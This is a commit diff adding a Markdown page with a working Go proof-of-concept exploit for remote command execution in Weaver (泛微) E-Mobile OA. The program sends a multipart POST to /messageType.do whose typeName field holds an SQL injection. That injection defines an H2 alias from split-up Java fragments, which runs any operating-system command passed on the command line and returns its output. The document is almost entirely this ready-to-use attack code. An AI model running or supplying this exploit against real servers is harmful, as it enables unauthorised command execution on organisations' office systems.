Create 泛微移动办公OA远程命令执行漏洞.md

2023-10-25 21:50:19 +08:00 · 2023-10-25 21:50:19 +08:00 · dd85c9b139
commit dd85c9b139
parent 682e1cf2bf
1 changed files with 71 additions and 0 deletions
--- a/泛微移动办公OA远程命令执行漏洞.md
+++ b/泛微移动办公OA远程命令执行漏洞.md
@ -0,0 +1,71 @@
+
+## 泛微移动办公OA远程命令执行漏洞
+
+## go语言 poc
+```go
+package main
+
+import (
+        "bytes"
+        "fmt"
+        "github.com/hpifu/go-kit/hflag"
+        "io/ioutil"
+        "mime/multipart"
+        "net/http"
+        "net/url"
+        "os"
+        "strings"
+)
+
+func main() {
+        t, c := getParam()
+        exploit(t, c)
+}
+
+func exploit(host, command string) {
+        p := "1';CREATE ALIAS if not exists MzSNqKsZTagm AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagm('" + url.QueryEscape(command) + "');--"
+        c := http.Client{}
+        buffer := &bytes.Buffer{}
+        writer := multipart.NewWriter(buffer)
+        field, _ := writer.CreateFormField("method")
+        field.Write([]byte("create"))
+        formField, _ := writer.CreateFormField("typeName")
+        formField.Write([]byte(p))
+        _ = writer.Close()
+        target := strings.Replace(host+"/messageType.do", "//mess", "/mess", 1)
+        request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String()))
+        request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36")
+        request.Header.Set("Accept", "*/*")
+        request.Header.Set("Connection", "close")
+        request.Header.Set("Content-Type", writer.FormDataContentType())
+        request.Header.Set("Content-Length", "1142")
+        request.Header.Set("Accept-Encoding", "")
+        do, err := c.Do(request)
+        if err != nil {
+                fmt.Println(err)
+        }
+        defer func() {
+                _ = do.Body.Close()
+        }()
+        all, err := ioutil.ReadAll(do.Body)
+        if err != nil {
+                fmt.Println(err)
+        }
+        if string(all) == "{\"status\":false}" {
+                fmt.Println("无效的命令,也许是服务器不支持或其他情况")
+                return
+        }
+        result := strings.Replace(fmt.Sprintf("%s", all), "{\"status\":false,\"ID\":\"1\",\"msg\":\"推送类型已存在\"}", "", -1)
+        fmt.Println("\n", result)
+}
+
+func getParam() (t, c string) {
+        hflag.AddFlag("target", "泛微E-MobileServer-地址", hflag.Required(), hflag.Shorthand("t"))
+        hflag.AddFlag("command", "待执行的系统命令", hflag.Required(), hflag.Shorthand("c"))
+        if err := hflag.Parse(); err != nil {
+                fmt.Println(hflag.Usage())
+                os.Exit(0)
+        }
+        return hflag.GetString("target"), hflag.GetString("command")
+}
+```